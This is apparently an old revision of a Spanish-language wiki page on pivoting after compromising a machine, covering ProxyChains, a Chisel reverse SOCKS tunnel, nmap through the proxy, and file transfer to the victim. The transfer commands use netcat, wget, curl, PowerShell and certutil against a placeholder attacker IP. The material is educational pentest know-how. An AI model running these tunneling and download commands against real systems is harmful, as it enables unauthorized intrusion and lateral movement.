| Proyecto Integral de Ingeniería del Software | |
|---|---|
| Metodologías Ágiles |
| Trabajo Fin De Grado | |
|---|---|
| Guía Memoria TFG |
| Servidores | |
|---|---|
| Minercraft | |
| Knoppia | |
| Omegacraft |
| Base de datos de juegos | |
|---|---|
| GameBoy Advance (GBA) |
| Proyecto Integral de Ingeniería del Software | |
|---|---|
| Metodologías Ágiles |
| Trabajo Fin De Grado | |
|---|---|
| Guía Memoria TFG |
| Servidores | |
|---|---|
| Minercraft | |
| Knoppia | |
| Omegacraft |
| Base de datos de juegos | |
|---|---|
| GameBoy Advance (GBA) |
¡Esta es una revisión vieja del documento!
Una vez se ha comprometido una máquina en la red objetivo, es posible que necesitemos permisos de administrador.
Es una herramienta que acctua como servidor proxy usando protocolos HTTP, HTTPS, SOCKS4 y SOCKS5, el cual funciona en sistemas Unix-Like. Esta herramienta permite que cualquier conexión TCP realizada por un programa local salaga a internet a través de una serie de proxies configurados hasta su destino.
ProxyChains permite en cadenar varios tipos de proxy simultáneamente. También permite deifinir un número máximo de proxies, cuandos más se encadenen, mayor anonimato se obtendrá. Es necesario configurar el archivo de configuración de proxychains y una lista de servidores proxy. El archivo de configuración se encuentra en la siguiente ruta:
/etc/proxychains.conf
Por defecto, proxychains trae configurada una conexión para TOR:
[ProxyList] socks4 127.0.0.1 9050
Es un túnel TCP/UDP sobre HTTP securizado via SSH. Funciona como un único ejecutble multiplataforma tanto en modo cliente como modo servidor.
#A ejecutar en el atacante ./chinsel server -reverse -p <Puerto_atacante> #A ejecutar en la víctima ./chinsel client <ip_atacate>:<Puerto_atacante> R:socks
Por defecto, chinsel se configura en el puerto 1080 asociado al proxychains, por lo que se debe añadir al fichero proxychains.conf.
socks5 127.0.0.1 1080
Una vez se tiene conectividad a través de la máquina víctima, se puede acceder a otras máquinas desconocidas, para ello se puede realizar un descubrimiento de la red con el siguiente comando:
proxychains nmap -A -Pn -n -p-o -v <IP_objetivo>
Si se quiere usar el navegador sobre el proxy, se debe configurar la extensión FoxyProxy sobre el navegador para que utilice el proxychains configurado.
Establece 2 flujos de bytes bidireccionales y transfiere datos entre ellos. Los canales de datos pueden ser archivos, tuberías, dispositivos o sockets. Proporciona bifurcación, registro y rastreo, distintos modos de comunicación entre procesos y muchas más opciones.
#Desde el atacante nc -lvp <puerto_atacante> < <archivo> #Desde la víctima nc <IP_atacante> <Puerto_atacante> > <archivo>
#Se crea un pequeño servidor web en el atacante con python Python -m SimpleHTTPServer <PUERTO_ATACANTE> #[LINUX] Se usa WGET o CURL desde la máquina objetivo para descargar el archivo wget http://<IP_ATACANTE>:<PUERTO_atacante>/<archivo> curl -O http://<IP_ATACANTE>:<PUERTO_atacante>/<archivo> #[WINDOWS] Se usa Windows File Transfer powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<IP_ATACANTE>:<PUERTO_ATACANTE>/<archivo>',' C:\Users\user\Desktop\<archivo>')“ certutil -urlcache -f http://<IP_ATACANTE>:<PUERTO_ATACANTE>/<archivo> <archivo>